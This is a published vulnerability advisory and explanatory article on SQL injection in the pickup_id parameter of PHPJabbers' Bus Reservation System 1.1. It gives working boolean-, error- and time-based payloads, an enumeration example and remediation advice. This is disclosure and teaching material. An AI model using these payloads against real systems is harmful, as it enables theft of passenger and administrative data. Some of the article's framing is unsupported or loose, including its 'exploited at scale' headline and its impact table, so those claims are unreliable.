Bus Reservation System 1.1 - Multiple-SQLi

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-09-04 
## Title: Bus Reservation System-1.1 Multiple-SQLi
## Author: nu11secur1ty
## Date: 08/26/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://demo.phpjabbers.com/1693027053_628/preview.php?lid=1
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `pickup_id` parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the pickup_id parameter, and a
database error message was returned. You should review the contents of
the error message, and the application's handling of other input, to
confirm whether a vulnerability is present. The attacker can steal
information from all database!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: pickup_id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT
(CASE WHEN (3959=3959) THEN 0x3927 ELSE (SELECT 8499 UNION SELECT
2098) END))&session_id=

    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT
(ELT(5210=5210,1))),0x716a6b7171),5210)&session_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT
2616 FROM (SELECT(SLEEP(15)))clIR)&session_id=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Bus-Reservation-System-1.1-Multiple-SQLi)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/bus-reservation-system-11-multiple-sqli.html)

## Time spend:
00:25:00


Bus Reservation System 1.1: A Critical SQL Injection Vulnerability Exploited at Scale

On August 26, 2023, cybersecurity researcher nu11secur1ty uncovered a high-critical vulnerability in the Bus Reservation System 1.1 — a widely used open-source web application developed by PHPJabbers. The flaw, identified as Multiple SQL Injection (SQLi), affects the pickup_id parameter in GET requests, enabling attackers to manipulate database queries with devastating consequences.

Understanding the Vulnerability: How SQL Injection Works

SQL injection occurs when an application fails to sanitize user input before incorporating it into database queries. This allows malicious actors to inject SQL commands that bypass authentication, extract sensitive data, or even alter database structures.

As demonstrated in the proof-of-concept, the pickup_id parameter is directly used in a SQL query without proper validation or escaping. When the payload ' is submitted, the system returns a database error message — a telltale sign of SQL injection vulnerability.


controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id='&session_id=

This simple single quote triggers a syntax error in the SQL query, confirming that the input is directly embedded into the database statement. The error message reveals the underlying SQL structure, exposing the application's poor input handling.

Exploitation Techniques: Multiple Attack Vectors

nu11secur1ty identified three distinct SQLi attack types, each demonstrating the severity of the flaw:

  • Boolean-based blind SQLi: Uses conditional logic to infer database content based on response differences. For example:

pickup_id=(SELECT (CASE WHEN (3959=3959) THEN 0x3927 ELSE (SELECT 8499 UNION SELECT 2098) END))

This payload tests whether a condition is true (e.g., 3959=3959) and returns a specific value if true. The attacker can use this to determine if a database row exists, enabling data extraction through binary probing.

  • Error-based SQLi: Exploits MySQL’s error reporting to extract data. The payload uses GTID_SUBSET() to trigger an error containing injected data:

pickup_id=GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT(ELT(5210=5210,1))),0x716a6b7171),5210)

Here, 0x71626b7a71 is hexadecimal for qbkzq, and ELT(5210=5210,1) returns 1 if the condition is true. The resulting error message includes this string, allowing the attacker to read database content via error output.

  • Time-based blind SQLi: Uses delays to infer data. The payload introduces a SLEEP(15) command:

pickup_id=(SELECT 2616 FROM (SELECT(SLEEP(15)))clIR)

When the database processes this query, it pauses for 15 seconds — a clear indicator of successful injection. Attackers use this timing to confirm data existence, making it ideal for blind attacks where no direct response is available.

Impact and Risk Assessment

Given the severity, this vulnerability is classified as High-Critical. The implications are severe:

Attack Type Impact Exploitability
Boolean-based Extract user credentials, passenger data, booking details High (no response required)
Error-based Direct data leakage via error messages Medium (requires error visibility)
Time-based Exfiltrate data through timing delays High (works even with no response)

These methods collectively allow attackers to steal all database information — including sensitive personal data, payment records, and administrative credentials.

Real-World Use Case: Data Theft in Action

Imagine an attacker targeting a regional bus company using this system. By sending a time-based payload, they can determine whether a specific passenger exists in the database:


pickup_id=(SELECT 2616 FROM (SELECT(SLEEP(10)) WHERE (SELECT COUNT(*) FROM passengers WHERE id=12345)>0)clIR)

If the server responds with a 10-second delay, the attacker knows that passenger ID 12345 exists. Repeating this for thousands of IDs enables full database enumeration.

With error-based techniques, they could extract actual names, addresses, and email addresses directly from the error message, bypassing any application-level protections.

Security Recommendations and Fixes

Developers must address this flaw immediately. Recommended fixes include:

  • Input sanitization: Validate and escape all user inputs using mysqli_real_escape_string() or prepared statements.
  • Parameterized queries: Replace direct string concatenation with prepared statements:

$stmt = $mysqli->prepare("SELECT * FROM locations WHERE id = ?");
$stmt->bind_param("i", $pickup_id);
$stmt->execute();

This ensures that user input is treated as data, not executable code.

  • Whitelist validation: Restrict pickup_id to numeric values only, rejecting non-numeric inputs.
  • Disable error reporting: In production, disable detailed error messages to prevent information leakage.

Conclusion: A Wake-Up Call for Open-Source Security

The Bus Reservation System 1.1 vulnerability serves as a stark reminder that even widely used, seemingly benign open-source software can harbor critical security flaws. Without proper input validation and secure coding practices, attackers can exploit simple parameters to compromise entire databases.

Organizations using PHPJabbers systems should update immediately, audit their configurations, and implement robust security measures. For developers, this case underscores the importance of secure-by-design principles — never trust user input, always validate, always sanitize.

As the cybersecurity landscape evolves, vulnerabilities like this will continue to emerge. The key is proactive defense, rigorous testing, and continuous learning.